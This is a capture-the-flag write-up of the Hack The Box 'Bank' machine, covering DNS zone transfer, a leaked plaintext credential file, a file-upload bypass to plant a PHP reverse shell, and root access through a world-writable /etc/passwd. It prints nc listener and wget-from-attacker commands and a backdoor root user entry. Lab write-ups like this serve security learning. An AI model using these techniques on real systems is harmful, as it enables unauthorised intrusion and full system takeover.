Търсене в общността

# Enumeration ### NMAP The nmap scan reveals port 53, 80 and 22 open so we could assume that there is an http web application, DNS and ssh services. Let's enumerate the DNS and check out the findings in our browser. Host is up (0.047s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3) # dig axfr @10.10.10.29 bank.htb ; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb ; (1 server found) ;; global options: +cmd bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800 bank.htb. 604800 IN NS ns.bank.htb. bank.htb. 604800 IN A 10.10.10.29 ns.bank.htb. 604800 IN A 10.10.10.29 www.bank.htb. 604800 IN CNAME bank.htb. bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800 ;; Query time: 47 msec ;; SERVER: 10.10.10.29#53(10.10.10.29) ;; WHEN: Tue May 11 03:28:16 EDT 2021 ;; XFR size: 6 records (messages 1, bytes 171) # Web App Enumeration #### /etc/hosts Add the IP address to our known hosts file in /etc/hosts as: 10.10.10.29 bank.htb chris.bank.htb ns.bank.htb #### chris.bank.htb bank.htb ns.bank.htb #### Dirbuster A couple of interesting directories were found for http://bank.htb including not present in the picture /balance-transfer/ directory. *user* and *ticket* files does not return anything but footer on the other hand: #### /balance-transfer/ Balance transfer is directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files. When opened, It seems that encryption failed since it is in plain text: --ERR ENCRYPT FAILED +=================+ | HTB Bank Report | +=================+ ===UserAccount=== Full Name: Christos Christopoulos Email: [email protected] Password: !##HTBB4nkP4ssw0rd!## CreditCards: 5 Transactions: 39 Balance: 8842803 . ===UserAccount=== # Exploit I have logged in to the given account and discovered a Support page which provides file upload functionality which reveals a possible attack surface. ## LFI The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with burp suite. #### Burp Suite After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it into the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila... ## Shell Open a nc listener that will intercept the reverse call and execute the file. $ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 5492 100 5492 0 0 53843 0 --:--:-- --:--:-- --:--:-- 53843 PHP Notice: Undefined variable: daemon in Standard input code on line 184 Successfully opened reverse shell to 10.10.14.3:1234 ***yikes***, I just hacked myself 😄 Anyway... let's try to forget about that and figure out my next move. I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with such extension will be executed as php. So I have uploaded the reverse shell as an htb and just opened it which returned a shell. # nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982 Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux 12:37:52 up 2:18, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ # Privilege EscalationWe are logged as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to folder /tmp because it is writeable directory and download the file from my local kali system. ┌──(kali㉿kali)-[~/bank] └─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check . ┌──(kali㉿kali)-[~/bank] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 - 10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 - $ cd tmp $ touch file $ ls file vmware-root $ wget http://10.10.14.3:8000/unix-privesc-check --2021-05-11 12:45:15-- http://10.10.14.3:8000/unix-privesc-check Connecting to 10.10.14.3:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 36801 (36K) [application/octet-stream] Saving to: 'unix-privesc-check' 0K .......... .......... .......... ..... 100% 654K=0.05s 2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801] $ Let's upgrade out session to be more intuitive and responsive. $ python -c 'import pty;pty.spawn("/bin/bash")' www-data@bank:/tmp$ export TERM=xterm export TERM=xterm www-data@bank:/tmp$ ^Z zsh: suspended nc -nlvp 1234 ┌──(root💀kali)-[/home/kali/bank] └─# stty raw -echo;fg 148 ⨯ 1 ⚙ [1] + continued nc -nlvp 1234 Now I have tab-completion and all keys register as normal. www-data@bank:/tmp$ chmod +x unix-privesc-check www-data@bank:/tmp$ ./unix-privesc-check standard ...[snip]... ############################################ Checking if anyone except root can change /etc/passwd WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password: $ openssl passwd -1 -salt hacker hacker $1$hacker$TzyKlv0/R/c28R.GAeLw.1 Next, add the user as follows: www-data@bank:/$ nano /etc/passwd ################################# add the user in the document like so: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash ################################# www-data@bank:/$ su hacker Password: root@bank:/# whoami root root@bank:/#